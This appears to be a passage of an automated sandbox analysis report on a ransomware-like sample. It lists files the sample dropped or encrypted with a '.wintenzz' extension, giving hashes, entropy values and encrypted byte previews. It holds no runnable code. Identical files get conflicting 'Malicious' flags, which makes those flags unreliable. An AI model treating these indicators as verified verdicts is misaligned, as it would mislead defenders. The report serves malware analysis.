Preview:	................fjm2QVIzyyBTOouIL0nvSEAD........._%....SOX..)K_.n....BMt5.w.H-..+B.$...[.(....W..{R........~...HfA..H".:.$z.d6......$..pj...&..+.{T.....Mi.w.i^.#.B.z.G...c......N.F..M.{.+.I...5...@...9.<...#.^cU........_y.=...4...&O.A.w...>...`(...d...f2..;H....n.....1-.....DE...rx.m.M...y..P..W......M...Ma.._..]...v..vD...1.`.@.AT ....ju:..:8...(M.7.y.i..0p....KP.4Sd1q...c.X.Wy ..>.`f.B.z.#..J4.`W.!G.;..jLY\|.n.@v...%..p.d.==Mn..bc...%..7J..>y.......>..\Z.5V.^T.a.A.\.@.Q...t...w..........O....v'c!.K[.,H]i..?w`..(d.......E..9*.1a<.p`,./p.cW4^(.. )q.,.hM..V[R.l.\|.$.........c ._.o...o...V.\|K.J.\|...q..7fIS.i.N&...9lG...G...<......t.d..ja\.O..I..Cc...Pm....b..0p...[.%..C....q>..M%.........F.S6..^.,.?......'.......=.V...(...X5.5....(...a.o.....e.=^..~$..e.w....g....Z..R....'X.HK....WK)....W.]cV...k..+.A..8/..N.\|+A..W......_.......@.G...o.L.x8S.8...V.....JM.X...JTX.n.yI.h9.t.s.K......[.P....W..G..{.N.5Q.......3.....4.........'n.fd.US7......X...e.@

C:\Users\user\Desktop\LHEPQPGEWF.xlsx.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.786786259862787
Encrypted:	false
SSDEEP:	24:ARiFJ+bhuVgnZf1OCCUZK+n7cspSwN3bnN5bNbRZH2:4iFJ+I7CjI+nrpr9VbW
MD5:	4F5565E9B946E510C19782268F6D688D
SHA1:	742AB850F1323A16318AFC3FFB4AD362020DC6EF
SHA-256:	CA871AF9585BFD1C69606E1FFCDE45D16B342B17ACF1A1D9F7BB0B1B4B6F8200
SHA-512:	10E84050911F61488397E3D3A17B49CFFA32CC701B775EF7C819B058530D9832F4EEB38FA793D3062C1A75B3E1FF26180FF2482F20A3388584E4471540F3437C
Malicious:	false
Preview:	................fjm2QVIzyyBTOouIL0nvSEAD........._%....SOX..)K_.n....BMt5.w.H-..+B.$...[.(....W..{R........~...HfA..H".:.$z.d6......$..pj...&..+.{T.....Mi.w.i^.#.B.z.G...c......N.F..M.{.+.I...5...@...9.<...#.^cU........_y.=...4...&O.A.w...>...`(...d...f2..;H....n.....1-.....DE...rx.m.M...y..P..W......M...Ma.._..]...v..vD...1.`.@.AT ....ju:..:8...(M.7.y.i..0p....KP.4Sd1q...c.X.Wy ..>.`f.B.z.#..J4.`W.!G.;..jLY\|.n.@v...%..p.d.==Mn..bc...%..7J..>y.......>..\Z.5V.^T.a.A.\.@.Q...t...w..........O....v'c!.K[.,H]i..?w`..(d.......E..9*.1a<.p`,./p.cW4^(.. )q.,.hM..V[R.l.\|.$.........c ._.o...o...V.\|K.J.\|...q..7fIS.i.N&...9lG...G...<......t.d..ja\.O..I..Cc...Pm....b..0p...[.%..C....q>..M%.........F.S6..^.,.?......'.......=.V...(...X5.5....(...a.o.....e.=^..~$..e.w....g....Z..R....'X.HK....WK)....W.]cV...k..+.A..8/..N.\|+A..W......_.......@.G...o.L.x8S.8...V.....JM.X...JTX.n.yI.h9.t.s.K......[.P....W..G..{.N.5Q.......3.....4.........'n.fd.US7......X...e.@

C:\Users\user\Desktop\LHEPQPGEWF\BQJUWOYRTO.pdf Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.794519962151232
Encrypted:	false
SSDEEP:	24:hJEsNnepubPHWV27YRpNbcMRmxtvybVO8Ues:hJEsZ1MUYRpNIMRcvgVAes
MD5:	CBFB8A35E58899225E2CB2603A543E34
SHA1:	A2A98C7039927A2A572F5223B423670551A22923
SHA-256:	26BBEF2C0653318594FDDD529B829C60EFD7D3914CBF3B47DCEA723F13007D5E
SHA-512:	6593099186CA9E4215012BE48972A556B7F5B798F800A0BD8615CD5D6250D79E350B07BB1DA16A1E93A422ABFEBCB668B3AF95C84DB7E12642B98211EE4CA99B
Malicious:	true
Preview:	................sVFBkrkO8ldh3m60kcyQ5ile........UV.+X.f....6.z..,WTs.....ZU....f.....{...I...y.C; .CQ=.^..Q.6..`..2.\gI.(..U.U..b.Y..W..L./..`.3.u....U...S. ..d.9uc...22.?.......G..JP,.Och..[.Q.Um....{[..'.f}TGy....mW...7...o.....LC\(.[..d=...q%8...N.BK.0..{F..f.g.q.<b>}.tz.jw....(.\.^..h.~.!...'.....8.....x. [n..K.....![......b.f.....zc.]...L.e.%...yt</}...N..c..6..".gki....T.&".+/....m.2)?...M..G..i..{9.l.-.....\......c&._.;.oZ..`I4F.<.R<..:...e......2#<!(;.....0.}...o...C. ....$.b.c...?&u.F.......A..{n....t....E..l{.a.$.yMc1.6^..Zp"...CZ.;..i...S..,...9.t..j.."..wk)..G?..^8...\..O.d....f....]. ..h{..E..Fk..v..QCy..S....x.x~0m^..Za....F.XDz...Z..9uW......w..#.L...,I...E...y..C...q............8~GC...Ol...6<8[.......;.,..)J!@.b{`..lrl...K.T...z....e.T.%0...D.SHyX.~..W.v../..eS1).#.....a...gq..?.v...-.....[..z$z....{\(...O!.u.Z"pc..tWb.Y....I.....].z].5 .7.D.k.h#K7],.M....G. nB.7.7......3Y4U..cZ~l..4.kBZ.C'c..X{..-.........:.Ey(.+.l.:.K...;.

C:\Users\user\Desktop\LHEPQPGEWF\BQJUWOYRTO.pdf.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.794519962151232
Encrypted:	false
SSDEEP:	24:hJEsNnepubPHWV27YRpNbcMRmxtvybVO8Ues:hJEsZ1MUYRpNIMRcvgVAes
MD5:	CBFB8A35E58899225E2CB2603A543E34
SHA1:	A2A98C7039927A2A572F5223B423670551A22923
SHA-256:	26BBEF2C0653318594FDDD529B829C60EFD7D3914CBF3B47DCEA723F13007D5E
SHA-512:	6593099186CA9E4215012BE48972A556B7F5B798F800A0BD8615CD5D6250D79E350B07BB1DA16A1E93A422ABFEBCB668B3AF95C84DB7E12642B98211EE4CA99B
Malicious:	false
Preview:	................sVFBkrkO8ldh3m60kcyQ5ile........UV.+X.f....6.z..,WTs.....ZU....f.....{...I...y.C; .CQ=.^..Q.6..`..2.\gI.(..U.U..b.Y..W..L./..`.3.u....U...S. ..d.9uc...22.?.......G..JP,.Och..[.Q.Um....{[..'.f}TGy....mW...7...o.....LC\(.[..d=...q%8...N.BK.0..{F..f.g.q.<b>}.tz.jw....(.\.^..h.~.!...'.....8.....x. [n..K.....![......b.f.....zc.]...L.e.%...yt</}...N..c..6..".gki....T.&".+/....m.2)?...M..G..i..{9.l.-.....\......c&._.;.oZ..`I4F.<.R<..:...e......2#<!(;.....0.}...o...C. ....$.b.c...?&u.F.......A..{n....t....E..l{.a.$.yMc1.6^..Zp"...CZ.;..i...S..,...9.t..j.."..wk)..G?..^8...\..O.d....f....]. ..h{..E..Fk..v..QCy..S....x.x~0m^..Za....F.XDz...Z..9uW......w..#.L...,I...E...y..C...q............8~GC...Ol...6<8[.......;.,..)J!@.b{`..lrl...K.T...z....e.T.%0...D.SHyX.~..W.v../..eS1).#.....a...gq..?.v...-.....[..z$z....{\(...O!.u.Z"pc..tWb.Y....I.....].z].5 .7.D.k.h#K7],.M....G. nB.7.7......3Y4U..cZ~l..4.kBZ.C'c..X{..-.........:.Ey(.+.l.:.K...;.

C:\Users\user\Desktop\LHEPQPGEWF\BUFZSQPCOH.png Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.815573744860472
Encrypted:	false
SSDEEP:	24:egfkszT4GLvusZ61AG4+geKgz2ergp7CtCln35dbK:egfkspD+gONi35dm
MD5:	3DD80A910CDF117C12B82C421A03A26D
SHA1:	307EDF109236FAA3BD1027B29546A757C39E6B38
SHA-256:	4B126364A0E607F3231F783858536228D04D7DB82B2637FB044B274A7D95C988
SHA-512:	05031DDEB7C4F18A4D4D152651D2396305FC628EED9ACCEFB19013D2AE0BBADF4D4F343DA3A1A3F9A36EFA53BEA75756C2B669BFC6C6BF1EB1E272740B828ABC
Malicious:	false
Preview:	................h6fSjsCKX3NkTyOMlXSCoC6g.........G...w.....?}[:.......:.A.q..f\|l.=..;..~Fj..d.WaR#{.j)3.1.-..q'../ P$....&j.......u...")eJ~U..NP........I...}..wY\|?.3z...lHn...m..._Og..l{.8...V.&B_.e.........z..........P.t..T...1.;....M...W.b.......Y...Ac..%.B.'.C.[...`..K: .....b....}.E.oF.,..h.....e\|.*..}\...1V.....N....>..G.e...?..'..r..H.!..9..Y.....B...-'...1.`.d...3.lb.7....-=..7I..p...@j[.$0.!.}.e:. .x...g.t.+o..X....$r....).ZG..V.....:..`..B`U~.........q...X..Q4.......Y.`.rj......UE..<_?.P.f-......a....dt3......[.~,.....B"J.b..p.4r.FW..N"...q.U..l..m......... ..s.x..)9wM.h.&%I.........Ym.y...z..d..W:.L....%.i.{f...i..k..d.\"..uq...2...xv....r..V...;1...\|.R.....o..4.w..h/k..o....,.>..?.d.mT.B{..hk.u...D....iY;..H.z...~...Z......S...k..{.P.bR...........n..y.h...!'..^..6'#g.=.=...Y...m.._....pR.o.qFd.....h].D..j....3...."W.@{'a...^..S....Z.p...x.,.]...N\|.x.l.O.....4v.......!..R...A..].!.I4./.w.c..\>...1.EP.iB..P...oK..^.+..h.a

C:\Users\user\Desktop\LHEPQPGEWF\BUFZSQPCOH.png.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.815573744860472
Encrypted:	false
SSDEEP:	24:egfkszT4GLvusZ61AG4+geKgz2ergp7CtCln35dbK:egfkspD+gONi35dm
MD5:	3DD80A910CDF117C12B82C421A03A26D
SHA1:	307EDF109236FAA3BD1027B29546A757C39E6B38
SHA-256:	4B126364A0E607F3231F783858536228D04D7DB82B2637FB044B274A7D95C988
SHA-512:	05031DDEB7C4F18A4D4D152651D2396305FC628EED9ACCEFB19013D2AE0BBADF4D4F343DA3A1A3F9A36EFA53BEA75756C2B669BFC6C6BF1EB1E272740B828ABC
Malicious:	false
Preview:	................h6fSjsCKX3NkTyOMlXSCoC6g.........G...w.....?}[:.......:.A.q..f\|l.=..;..~Fj..d.WaR#{.j)3.1.-..q'../ P$....&j.......u...")eJ~U..NP........I...}..wY\|?.3z...lHn...m..._Og..l{.8...V.&B_.e.........z..........P.t..T...1.;....M...W.b.......Y...Ac..%.B.'.C.[...`..K: .....b....}.E.oF.,..h.....e\|.*..}\...1V.....N....>..G.e...?..'..r..H.!..9..Y.....B...-'...1.`.d...3.lb.7....-=..7I..p...@j[.$0.!.}.e:. .x...g.t.+o..X....$r....).ZG..V.....:..`..B`U~.........q...X..Q4.......Y.`.rj......UE..<_?.P.f-......a....dt3......[.~,.....B"J.b..p.4r.FW..N"...q.U..l..m......... ..s.x..)9wM.h.&%I.........Ym.y...z..d..W:.L....%.i.{f...i..k..d.\"..uq...2...xv....r..V...;1...\|.R.....o..4.w..h/k..o....,.>..?.d.mT.B{..hk.u...D....iY;..H.z...~...Z......S...k..{.P.bR...........n..y.h...!'..^..6'#g.=.=...Y...m.._....pR.o.qFd.....h].D..j....3...."W.@{'a...^..S....Z.p...x.,.]...N\|.x.l.O.....4v.......!..R...A..].!.I4./.w.c..\>...1.EP.iB..P...oK..^.+..h.a

C:\Users\user\Desktop\LHEPQPGEWF\FAAGWHBVUU.mp3 Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.785663279302785
Encrypted:	false
SSDEEP:	24:dv85wXut/DrK+MbPeAJa9+FWTpA5hyRkQsStsvuiQ5:m5wg/K+EI9+FWtMyRkQD7iQ5
MD5:	AAF746030D807C9AB60E43CFF2982F73
SHA1:	D61968E95E65B6C8771EC7E048935C41A40696C8
SHA-256:	06D5BB487E176D8642FEF598907FE8405A545A811D9194C66F1449788930B558
SHA-512:	EB155560070061B925F2161402C38A63A76050DC629426854FCBB9E5A376C41964A90C2FE10F8A0C9F1292FA2F464711601F95740C13258BE99E2B077D8A007D
Malicious:	false
Preview:	................PM4lFDj5MoQiEcSauCoFGlWQ........^.(..Jh%.F.....t.)..J....w}d3...]=..J..k..2.2....<.._..5J8Kd..N0...3.8=..<.tt...H....J.....K.9_T..4.8.C..x=.....Q..u+.....q.;i..8l..~>.W.fV.#._....cx.G..%B.K6.3....}.../..H.C;.f.7..(.;..k.m.z....)....Z....5.....2).^>.....m.S..,...A...G>i...n..........M:.Ts....].61...VHuT.....L.Ec.`1'/...B..+E..9.?9..<a.x..f..t...U+.?r.q....:....a!..i..D.l...bS.y..B\|n..j..5..<.Nt)7x.G.Ux.\O...H`... V=..[.d..5.D..Qqf.vg.g.A..D.b.r...;.\|.X~.E..'R......m-.@,.~..N.3.n.......@..~KMeu..o..'g`...2.7.)y9][&.E4F.......gq%.......F...txqX...+.Km.;....a....U-...]g...c,...1...3w0...m..^.>....=....b].\...:...>..bzW...<.(1.;.6..Kupr..;...k...\|.G..e.......v.d......R`..qd&.R.M..k#.S.rV..e.a.K.Y.Q.....:#,.9o...-x...L.Nc.5....T..zJ\|8._..N.p.......`.....p..;". .I.g..7Is5z[...S...O.f..^g1e.........%.a..Bbv.......+t-[IM....4+..m...F.=$?.dMUYP......e.L.G.....V.. ?d+N2}.k...Nq....t. J.).......A....C..m.....~.....F...F.<.Y..p

C:\Users\user\Desktop\LHEPQPGEWF\FAAGWHBVUU.mp3.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.785663279302785
Encrypted:	false
SSDEEP:	24:dv85wXut/DrK+MbPeAJa9+FWTpA5hyRkQsStsvuiQ5:m5wg/K+EI9+FWtMyRkQD7iQ5
MD5:	AAF746030D807C9AB60E43CFF2982F73
SHA1:	D61968E95E65B6C8771EC7E048935C41A40696C8
SHA-256:	06D5BB487E176D8642FEF598907FE8405A545A811D9194C66F1449788930B558
SHA-512:	EB155560070061B925F2161402C38A63A76050DC629426854FCBB9E5A376C41964A90C2FE10F8A0C9F1292FA2F464711601F95740C13258BE99E2B077D8A007D
Malicious:	false
Preview:	................PM4lFDj5MoQiEcSauCoFGlWQ........^.(..Jh%.F.....t.)..J....w}d3...]=..J..k..2.2....<.._..5J8Kd..N0...3.8=..<.tt...H....J.....K.9_T..4.8.C..x=.....Q..u+.....q.;i..8l..~>.W.fV.#._....cx.G..%B.K6.3....}.../..H.C;.f.7..(.;..k.m.z....)....Z....5.....2).^>.....m.S..,...A...G>i...n..........M:.Ts....].61...VHuT.....L.Ec.`1'/...B..+E..9.?9..<a.x..f..t...U+.?r.q....:....a!..i..D.l...bS.y..B\|n..j..5..<.Nt)7x.G.Ux.\O...H`... V=..[.d..5.D..Qqf.vg.g.A..D.b.r...;.\|.X~.E..'R......m-.@,.~..N.3.n.......@..~KMeu..o..'g`...2.7.)y9][&.E4F.......gq%.......F...txqX...+.Km.;....a....U-...]g...c,...1...3w0...m..^.>....=....b].\...:...>..bzW...<.(1.;.6..Kupr..;...k...\|.G..e.......v.d......R`..qd&.R.M..k#.S.rV..e.a.K.Y.Q.....:#,.9o...-x...L.Nc.5....T..zJ\|8._..N.p.......`.....p..;". .I.g..7Is5z[...S...O.f..^g1e.........%.a..Bbv.......+t-[IM....4+..m...F.=$?.dMUYP......e.L.G.....V.. ?d+N2}.k...Nq....t. J.).......A....C..m.....~.....F...F.<.Y..p

C:\Users\user\Desktop\LHEPQPGEWF\GNLQNHOLWB.jpg Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.805850633594176
Encrypted:	false
SSDEEP:	24:TQyxHJmQlAJp1JxiVrtq+Fc8Bac5tq4WTvpZeX/L2:l3vspzxiltqd8sGQ4gBZ02
MD5:	FB24AEC58CE50CDFDE4CD268B252942A
SHA1:	D9D26C74FFD19AFA60201EA130F928E165D9FC3E
SHA-256:	E6184323B0E6F8540A63CB49717BA3073106B989399743E327B3E9FE66A86856
SHA-512:	BEC65A7F3E76AADD92F66627364854BA94593F57FE7BA7471FBD3160AA016D2C00D2F074F02525289B5A12432B234ED8B48F23D37406DA4F2A8274A4C3C3FFB5
Malicious:	false
Preview:	................qw0BX3G1GJfX8KGjhgmM6t4g.........+..r.4..q.M.w.'....4n.K.'....=(..=.....j.F?..p..gT............"$".(-5.aQ.m.....L.R'4...#.`9Q...d.`..^......\|e<J.`5.q..z..a.c..Sh.S.:t.C.b(..~..1.Q.+.^z}.Y!7....f..lM.u.e.....t<....B...-.>Wu..2u...z..`.g.B........U......3..."..K.W2m.U03A..\.9.=.c&@.VXx(...}U..<9Q.}.Bt...3F.aJ.q.....r....(P9.u.............=.n7.]}z.B...f. ..a.c...K...A.m.........`.....f....%H........v..~.....s....d.+.1H1\..Q....E%:...w....sc.._.,#.v...f...D#]..,P,QTG...I6<.].3...h{...O.g.p.. ......B...y...VB.e0;.;.I.n..H5.~}...".=.JyDy.+..%..#.....X.J..L.,.3@.t.h=....s....G.....0,3>s0Ll......?.y.L.6.............Z.g.k@L.=lK@....Kp89O:.+.L~...I.W.8.1E...7$i+N...{...k.6Y.C.^N..*..s..I.......b....pKW.(".,.O....N.z.....an'Q..X.c_.K.QN..o...q..wl.vs...h......-.}HlYJCVu..J.G.....rg.A.D.D.ye/W(.6?.f....(..c.,../...........'..o.k.{..Jr....[..R...&.ov....v.[p.N.ca.j(....k.&....v....R=D.\|D....."h.....o.+.`$h.-..i....s,%0.ikm

C:\Users\user\Desktop\LHEPQPGEWF\GNLQNHOLWB.jpg.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.805850633594176
Encrypted:	false
SSDEEP:	24:TQyxHJmQlAJp1JxiVrtq+Fc8Bac5tq4WTvpZeX/L2:l3vspzxiltqd8sGQ4gBZ02
MD5:	FB24AEC58CE50CDFDE4CD268B252942A
SHA1:	D9D26C74FFD19AFA60201EA130F928E165D9FC3E
SHA-256:	E6184323B0E6F8540A63CB49717BA3073106B989399743E327B3E9FE66A86856
SHA-512:	BEC65A7F3E76AADD92F66627364854BA94593F57FE7BA7471FBD3160AA016D2C00D2F074F02525289B5A12432B234ED8B48F23D37406DA4F2A8274A4C3C3FFB5
Malicious:	false
Preview:	................qw0BX3G1GJfX8KGjhgmM6t4g.........+..r.4..q.M.w.'....4n.K.'....=(..=.....j.F?..p..gT............"$".(-5.aQ.m.....L.R'4...#.`9Q...d.`..^......\|e<J.`5.q..z..a.c..Sh.S.:t.C.b(..~..1.Q.+.^z}.Y!7....f..lM.u.e.....t<....B...-.>Wu..2u...z..`.g.B........U......3..."..K.W2m.U03A..\.9.=.c&@.VXx(...}U..<9Q.}.Bt...3F.aJ.q.....r....(P9.u.............=.n7.]}z.B...f. ..a.c...K...A.m.........`.....f....%H........v..~.....s....d.+.1H1\..Q....E%:...w....sc.._.,#.v...f...D#]..,P,QTG...I6<.].3...h{...O.g.p.. ......B...y...VB.e0;.;.I.n..H5.~}...".=.JyDy.+..%..#.....X.J..L.,.3@.t.h=....s....G.....0,3>s0Ll......?.y.L.6.............Z.g.k@L.=lK@....Kp89O:.+.L~...I.W.8.1E...7$i+N...{...k.6Y.C.^N..*..s..I.......b....pKW.(".,.O....N.z.....an'Q..X.c_.K.QN..o...q..wl.vs...h......-.}HlYJCVu..J.G.....rg.A.D.D.ye/W(.6?.f....(..c.,../...........'..o.k.{..Jr....[..R...&.ov....v.[p.N.ca.j(....k.&....v....R=D.\|D....."h.....o.+.`$h.-..i....s,%0.ikm

C:\Users\user\Desktop\LHEPQPGEWF\LHEPQPGEWF.docx Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.773842927225872
Encrypted:	false
SSDEEP:	24:oDPKHv1uh6VZynlqi8A06K2+xApCm2u3pP9r0W8j:oDPOv1uh7EawApCmG3
MD5:	F993C69DA39B7689FB4E910E715A3D1F
SHA1:	6D151CDFC1B396E96AF7AE6F7C575F4570C6EA05
SHA-256:	DC9F8CFD1E06EFF8040346F6887F1E14D9B29E245BCCA52B3CA036BA8F2C6EB0
SHA-512:	39DDC43CBC1EF3919EF34B871AC97C1D36EDB00BD39BFE1D72AA87C2F8980D6071AE33BE5A3E385D16009752A3AE0FBD1719E721604019FE8EAD5E150F3CFA07
Malicious:	false
Preview:	................hEFmvoZU4OnUFhinn0Nan1gH........&.M...[O..L..c....f..e._y...Y.....E....j.t.dg...3...Nu..4.Qf4..LJ...!...\..Y.-1k:..8....N..........:-.f...[.}..b`y..?.~y.q.....#..j.,y.S'db...c3O.:....,.L+M..jz..H..7.....n.,i.....Ib4G..d9.>.9L....k:y.... `O.=.bZ)...aS......1ri)b...!.y...>....N..c.vQT..V...S.n...?.......C..}.......9E..q..oR.."f..z).[s'......J..o..B.~..Q%.C(..&.90.U...._\...rn.t..r.1....h..#....0.x...=...d."H.d_.h....V8m...O..+.?..e...Q.Du.n....%.Jb.Y....r.o .F..yq...:................E.k.UG.....>.%.......7]...E..7..0.%...G..E.$A.9.B.C.M.O.{..9....Qw...g..<.....{.o.GI.Z....f..sH...;8=6.:..Z........BB..+.L{.c'i..Z...<.3.)Q.....5.......R#.Q...\h..-.......aM...H<m...........w\J.7.H...s.`.%..7q..aV...3....F.<....C.^.1.....0#..9..T..c.$"4.)Ew.V.M@N^g."9....>....Ml.H.hg.F.....S.h...^.t.E(.+.G.<....I..H.....=....q.._.m.=.......Qw.a5$&H?.%......Yv.....$.H....@.~..q.q.<%A".(...0..{. .}...D..<-jcv..K...I...*;.5p..H..s= :...;%4.1.....T..y

C:\Users\user\Desktop\LHEPQPGEWF\LHEPQPGEWF.docx.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.773842927225872
Encrypted:	false
SSDEEP:	24:oDPKHv1uh6VZynlqi8A06K2+xApCm2u3pP9r0W8j:oDPOv1uh7EawApCmG3
MD5:	F993C69DA39B7689FB4E910E715A3D1F
SHA1:	6D151CDFC1B396E96AF7AE6F7C575F4570C6EA05
SHA-256:	DC9F8CFD1E06EFF8040346F6887F1E14D9B29E245BCCA52B3CA036BA8F2C6EB0
SHA-512:	39DDC43CBC1EF3919EF34B871AC97C1D36EDB00BD39BFE1D72AA87C2F8980D6071AE33BE5A3E385D16009752A3AE0FBD1719E721604019FE8EAD5E150F3CFA07
Malicious:	false
Preview:	................hEFmvoZU4OnUFhinn0Nan1gH........&.M...[O..L..c....f..e._y...Y.....E....j.t.dg...3...Nu..4.Qf4..LJ...!...\..Y.-1k:..8....N..........:-.f...[.}..b`y..?.~y.q.....#..j.,y.S'db...c3O.:....,.L+M..jz..H..7.....n.,i.....Ib4G..d9.>.9L....k:y.... `O.=.bZ)...aS......1ri)b...!.y...>....N..c.vQT..V...S.n...?.......C..}.......9E..q..oR.."f..z).[s'......J..o..B.~..Q%.C(..&.90.U...._\...rn.t..r.1....h..#....0.x...=...d."H.d_.h....V8m...O..+.?..e...Q.Du.n....%.Jb.Y....r.o .F..yq...:................E.k.UG.....>.%.......7]...E..7..0.%...G..E.$A.9.B.C.M.O.{..9....Qw...g..<.....{.o.GI.Z....f..sH...;8=6.:..Z........BB..+.L{.c'i..Z...<.3.)Q.....5.......R#.Q...\h..-.......aM...H<m...........w\J.7.H...s.`.%..7q..aV...3....F.<....C.^.1.....0#..9..T..c.$"4.)Ew.V.M@N^g."9....>....Ml.H.hg.F.....S.h...^.t.E(.+.G.<....I..H.....=....q.._.m.=.......Qw.a5$&H?.%......Yv.....$.H....@.~..q.q.<%A".(...0..{. .}...D..<-jcv..K...I...*;.5p..H..s= :...;%4.1.....T..y

C:\Users\user\Desktop\LHEPQPGEWF\NIRMEKAMZH.xlsx Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.770186672789994
Encrypted:	false
SSDEEP:	24:Zi1xwlL/JgNb471MmaiHtzgLrXfBRjAVm0RB6g66xN/k:Zi1xwlrKNkWiNkL7fB5AFRBJ6d
MD5:	4883BF29EC428CCF7DFD42072C6CA8F2
SHA1:	936D35ADC89ED00C5B44594B8FA68B34737D44BD
SHA-256:	0AF3BBD9EB549F90904304F5F03D7F8B22EB9928601993911CF50132B3FFB308
SHA-512:	B88AE94062C97C6BFFC1A81D9D211D5668F77F349A9D3D0EF591046ADC1AA88CDEE7E4E0A80C4E216A2A717449C133E2585CE671C0DC85BCB5E8C541BAD3C0E1
Malicious:	false
Preview:	................bbDfwVl8JllIPATrZ84tZht8.........N.r..F.(..zi.`..G...Y.#. .Vv.q7..\.........x.E).I..}^......(.U.J..".......Y..k...i.....a...g~..r..h..].Xb.\|P@+...1B.....I..f.D9...u.....yn.y....x...ZJZ.'......nQ...,.a.ka^.r.!#.kW\?.s7<......;4.q.6.5>...=.....x....~..L=,...7r=.U.\.-.....A.1R&vt_..G.#........tg....0...[[..n(.MA-[q.}..W...9..'XJ.AP.q.(......d.n.IJ.,..%4.....10.........X..Ugs.:[..Jd.[.Wav.E)F..W.to...rX]C...ai.J.,....b.w.0)...cx.V..z.......CsM.Hv....:..w..6`.N."?.m.g7=....w................`Mn..<,..!..Vx.D.N..1.?!......Y....G.PiU.2..}.qT@.J^j...-.....gkUq.9.u!..n.7F..h;.....F...+....._...IT.)w.....".}.\..A.%.1.i.T.,.6.kM.b).......4........d.R.."'mGT....Q.....$2.p.1..Q3E..K...7..^.o.......f<.h.}9.FL...4Y......(..Q ...B.}.c.Y....OH..8.t......2...;)p_...X0.....G.kv.u..o.....O..Xu.B..{.B6.I...Y_.%8e...3...)..2.$...iB..%J...4.Y6x..).n.<.5....^.z..,A......_.*.5.+.&xp........}(....T....S!.. [K...0x......3....5.7(.~..\| gY..

C:\Users\user\Desktop\LHEPQPGEWF\NIRMEKAMZH.xlsx.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.770186672789994
Encrypted:	false
SSDEEP:	24:Zi1xwlL/JgNb471MmaiHtzgLrXfBRjAVm0RB6g66xN/k:Zi1xwlrKNkWiNkL7fB5AFRBJ6d
MD5:	4883BF29EC428CCF7DFD42072C6CA8F2
SHA1:	936D35ADC89ED00C5B44594B8FA68B34737D44BD
SHA-256:	0AF3BBD9EB549F90904304F5F03D7F8B22EB9928601993911CF50132B3FFB308
SHA-512:	B88AE94062C97C6BFFC1A81D9D211D5668F77F349A9D3D0EF591046ADC1AA88CDEE7E4E0A80C4E216A2A717449C133E2585CE671C0DC85BCB5E8C541BAD3C0E1
Malicious:	false
Preview:	................bbDfwVl8JllIPATrZ84tZht8.........N.r..F.(..zi.`..G...Y.#. .Vv.q7..\.........x.E).I..}^......(.U.J..".......Y..k...i.....a...g~..r..h..].Xb.\|P@+...1B.....I..f.D9...u.....yn.y....x...ZJZ.'......nQ...,.a.ka^.r.!#.kW\?.s7<......;4.q.6.5>...=.....x....~..L=,...7r=.U.\.-.....A.1R&vt_..G.#........tg....0...[[..n(.MA-[q.}..W...9..'XJ.AP.q.(......d.n.IJ.,..%4.....10.........X..Ugs.:[..Jd.[.Wav.E)F..W.to...rX]C...ai.J.,....b.w.0)...cx.V..z.......CsM.Hv....:..w..6`.N."?.m.g7=....w................`Mn..<,..!..Vx.D.N..1.?!......Y....G.PiU.2..}.qT@.J^j...-.....gkUq.9.u!..n.7F..h;.....F...+....._...IT.)w.....".}.\..A.%.1.i.T.,.6.kM.b).......4........d.R.."'mGT....Q.....$2.p.1..Q3E..K...7..^.o.......f<.h.}9.FL...4Y......(..Q ...B.}.c.Y....OH..8.t......2...;)p_...X0.....G.kv.u..o.....O..Xu.B..{.B6.I...Y_.%8e...3...)..2.$...iB..%J...4.Y6x..).n.<.5....^.z..,A......_.*.5.+.&xp........}(....T....S!.. [K...0x......3....5.7(.~..\| gY..

C:\Users\user\Desktop\NIRMEKAMZH.jpg Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.786108547301971
Encrypted:	false
SSDEEP:	24:UHOO1wLBe/8OUNq3zhdAd0ecCZSPoIlySYzaivhFbXiBuIHjnguxfB:quBu85Oz8d0nCZSPoIlZYzai5Fb+hgo
MD5:	BC4DA157B012631994B152831C06D82D
SHA1:	6652854E672C1E26D3F56B4D84AF83D9AD1D8C34
SHA-256:	91F9F144C9F48B7A87D63617ED62DF09E9217D5AD80B1D316C148B59ECF3B0E3
SHA-512:	E21FF0589D2C3ABCC9E846E96C62CBC68F14B3806A70A8E1A07349BD487B8784545B6096DE513FA50DA3F15A35ABC155A6D32183A405C014845AD9AB2CF7617D
Malicious:	false
